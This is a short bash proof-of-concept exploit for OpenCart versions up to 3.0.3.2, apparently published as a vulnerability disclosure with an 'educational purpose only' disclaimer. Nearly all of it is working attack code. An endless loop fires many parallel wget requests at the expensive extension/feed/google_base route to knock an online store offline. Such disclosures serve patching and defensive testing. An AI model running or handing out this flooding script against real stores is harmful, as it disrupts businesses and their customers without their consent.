Opencart versions 3.0.3.2 and below extension/feed/google_base remote denial of service proof of concept exploit.
8f7d02198514d6db4dfef8e0e72e0139#!/bin/bash
#
# Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# PoC exploit, just for test...
# Tested on store with added more than 1000 products
# Usage: ./cartkiller.sh store_url threads sleep
# Example: ./cartkiller.sh https://store_name 50 5
#
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
echo "Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit"
echo
echo "Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>"
echo
echo "PoC exploit, just for test..."
echo "Tested on store with added more than 1000 products"
if [ -z "$3" ]; then
echo Usage: "$0" store_url threads sleep
echo Example: "$0" https://store_name 50 5
exit 4
fi
url="$1"
threads="$2"
sleep="$3"
while :
do
for ((i=1;i<=$2;i++));
do
wget "$url/index.php?route=extension/feed/google_base" --user-agent="Mozilla/5.0 (OpenCart Killer v2 google_base Denial Of Service)" --quiet -O /dev/null -o /dev/null &
done
#
# Sleep between loops..
#
sleep $sleep
done